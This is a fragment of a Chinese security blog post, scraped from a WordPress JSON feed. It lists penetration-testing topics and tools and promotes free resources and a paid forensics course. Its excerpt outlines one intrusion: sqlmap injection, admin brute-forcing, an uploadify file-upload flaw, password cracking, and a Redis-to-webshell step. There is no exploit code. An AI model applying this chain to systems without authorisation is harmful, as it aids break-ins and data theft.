\u5185\u5bb9\u7279\u70b9:\u6761\u7406\u6e05\u6670,\u542b\u56fe\u50cf\u5316\u8868\u793a\u66f4\u52a0\u6613\u61c2\u3002<\/p>\n
\u5185\u5bb9\u6982\u8981:\u5305\u62ec \u5185\u7f51\u3001\u64cd\u4f5c\u7cfb\u7edf\u3001\u534f\u8bae\u3001\u6e17\u900f\u6d4b\u8bd5\u3001\u5b89\u670d\u3001\u6f0f\u6d1e\u3001\u6ce8\u5165\u3001XSS\u3001CSRF\u3001SSRF\u3001\u6587\u4ef6\u4e0a\u4f20\u3001\u6587\u4ef6\u4e0b\u8f7d\u3001\u6587\u4ef6\u5305\u542b\u3001XXE\u3001\u903b\u8f91\u6f0f\u6d1e\u3001\u5de5\u5177\u3001SQLmap\u3001NMAP\u3001BP\u3001MSF\u2026<\/p>\n
![\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043052-680db2fc61d93.png\")
<\/p>\n
\u56e0\u7bc7\u5e45\u6709\u9650,\u4ec5\u5c55\u793a\u90e8\u5206\u8d44\u6599,\u9700\u8981\u89c1\u4e0b\u56fe\u5373\u53ef\u524d\u5f80\u83b7\u53d6 <\/p>\n
🐵\u8fd9\u4e9b\u4e1c\u897f\u6211\u90fd\u53ef\u4ee5\u514d\u8d39\u5206\u4eab\u7ed9\u5927\u5bb6,\u9700\u8981\u7684\u53ef\u4ee5\u70b9\u8fd9\u91cc\u81ea\u53d6👉:\u7f51\u5b89\u5165\u95e8\u5230\u8fdb\u9636\u8d44\u6e90 \u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014<\/p>\n
\u7248\u6743\u58f0\u660e:\u672c\u6587\u4e3a\u535a\u4e3b\u539f\u521b\u6587\u7ae0,\u9075\u5faa CC 4.0 BY-SA \u7248\u6743\u534f\u8bae,\u8f6c\u8f7d\u8bf7\u9644\u4e0a\u539f\u6587\u51fa\u5904\u94fe\u63a5\u548c\u672c\u58f0\u660e\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
\u6587\u7ae0\u6d4f\u89c8\u9605\u8bfb803\u6b21\uff0c\u70b9\u8d5e21\u6b21\uff0c\u6536\u85cf25\u6b21\u3002\u672c\u6b21\u6e17\u900f\u7528\u5230\u4e86\u591a\u4e2a\u6280\u672f:1.burpsuite\u6293\u5305\uff0c\u5bf9\u5305\u6587\u4ef6\uff0c\u4f7f\u7528sqlmap\u8fdb\u884c\u6ce8\u5165sqlmap \u2013r r.txt2.\u540e\u53f0\u8d26\u53f7\u7684\u66b4\u529b\u7834\u89e3\uff0c\u901a\u8fc7burpsuite\u5bf9\u8d26\u53f7\u8fdb\u884c\u66b4\u529b\u7834\u89e3\u30023. uploadify\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e4.\u540e\u53f0\u52a0\u5bc6\u6587\u4ef6\u5bc6\u7801\u7b97\u6cd5\u53ca\u5bc6\u7801\u7834\u89e3\u5206\u67905.redis\u6f0f\u6d1e\u83b7\u53d6webshell\u65b9\u6cd56.masscan\u53canmap\u5168\u7aef\u53e3\u626b\u63cf\u53e6\u5916\u63a8\u51fa\u300a\u5b9e\u6218\u4e2d\u768420\u4e2a\u53d6\u8bc1\u6280\u672f\u300b\u89c6\u9891\u8bfe\u7a0b\uff0c\u552e\u4ef7298\u5143\uff0c\u57fa\u672c\u6db5\u76d6\u76ee\u524d\u7684\u6253\u51fb\u53d6\u8bc1\u9700\u8981\uff0c\u53ef\u4ee5\u8054\u7cfb\u5fae\u4fe1lovesec2022\u8d2d\u4e70\u3002<\/p>\n","protected":false},"author":2,"featured_media":33420,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[2390,275,87,61,100,43,958,478,122,44],"topic":[],"class_list":["post-33431","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-server","tag-okhttp","tag-web","tag-87","tag-61","tag-100","tag-43","tag-958","tag-478","tag-122","tag-44"],"yoast_head":"\n